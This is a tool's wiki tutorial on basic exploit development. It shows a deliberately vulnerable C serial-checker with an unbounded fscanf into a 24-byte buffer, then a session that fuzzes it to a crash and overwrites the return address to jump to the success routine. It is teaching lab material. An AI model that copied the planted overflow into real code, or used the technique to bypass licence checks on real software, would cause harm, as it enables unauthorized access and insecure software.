
Exploit development

m4n3dw0lf edited this page Jul 13, 2016 · 16 revisions

# Exploit Development

## Exploit Development 1: Overwriting Instruction Pointer

  • Vulnerable Serial-Key C program.
//Disable Canaries, Compile: gcc serial.c -fno-stack-protector -o serial
//Disable ASLR, echo 0 > /proc/sys/kernel/randomize_va_space

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Check whether a serial string satisfies the key rule.
 *
 * A serial is accepted only when it is at least 10 bytes long, every
 * byte lies in the ASCII range '0'..'z' (inclusive), and the sum of its
 * bytes taken modulo 853 equals 83.
 *
 * psz: NUL-terminated string to check; must not be NULL (strlen is
 *      called on it unconditionally).
 * Returns 1 when the serial is accepted, 0 otherwise.
 */
int valid_serial(char *psz){
	size_t n = strlen(psz);
	if (n < 10)
		return 0;

	unsigned sum = 0;
	for (const char *p = psz; p != psz + n; p++) {
		/* One byte outside '0'..'z' rejects the whole key. Where char is
		 * signed, bytes >= 0x80 compare below '0' and are rejected too. */
		if (*p < '0' || *p > 'z')
			return 0;
		sum += *p;
	}

	return (sum % 853 == 83) ? 1 : 0;
}

/*
 * Read one whitespace-delimited token from stdin and validate it as a
 * serial with valid_serial().
 *
 * Returns 1 when the token is accepted, 0 otherwise.
 *
 * This is the page's intentional bug: the "%s" conversion carries no
 * field width, so a token longer than 23 bytes overruns serial[24]
 * (the hardened form would be "%23s"). The fscanf() result is also not
 * checked, so on EOF or a read error valid_serial() runs strlen() over
 * an uninitialized buffer.
 */
int validate_serial(){
	char serial[24];

	fscanf(stdin, "%s", serial);

	return valid_serial(serial) != 0;
}

/*
 * Success path: announce the accepted serial and terminate the process
 * with status 0. Never returns (exit() is called), so the declared int
 * return value is never produced.
 */
int do_valid_stuff(){
	fputs("The serial number is valid!\n", stdout);
	// do serial-restricted, valid stuff here.
	exit(0);
}

/*
 * Failure path: report the rejected serial and terminate the process
 * with status 1. Never returns (exit() is called), so the declared int
 * return value is never produced.
 */
int do_invalid_stuff(){
	fputs("Invalid serial number!\nExiting\n", stdout);
	exit(1);
}

/*
 * Entry point: read a serial from stdin and dispatch to the success or
 * failure handler. Both handlers call exit(), so the trailing return 0
 * is only reached if one of them ever returns. argc/argv are unused.
 */
int main(int argc, char *argv[] ){
	(void)argc;
	(void)argv;

	int accepted = validate_serial();
	if (!accepted) {
		do_invalid_stuff();
	} else {
		do_valid_stuff();
	}
	return 0;
}
  • commands:
 pythem> gcc serial.c -fno-stack-protector -o serial
 
 pythem> ./serial
 123456
 Invalid serial number!
 Exiting

 pythem> gdb ./serial

 (gdb) disas main
 Dump of assembler code for function main:
              ...
 callq  0x400723 <do_valid_stuff>
              ...
 
 (gdb) quit
 
 pythem> set file ./serial
 
 pythem> fuzz stdin
              ...
 [*] Sending buffer with lenght: 39
              ...
 [*] Child program exited with code 1

 [*] Hit enter to continue.

 [*] Sending buffer with lenght: 40

 [*] Sending buffer with lenght: 41


 [*] Child program crashed with SIGSEGV
 ^C
 
 pythem> xploit stdin
 
 xploit> set arch x64
 
 xploit> set offset
 [+] Enter the offset (number of 'A's): 40
 xploit> set addr1
 [+] First address to overwrite: 0x400723
 
 xploit> xploit
 [+] Writing payload into buffer.txt

 [*] Sending buffer with lenght: 58

 The serial number is valid!

 Exiting 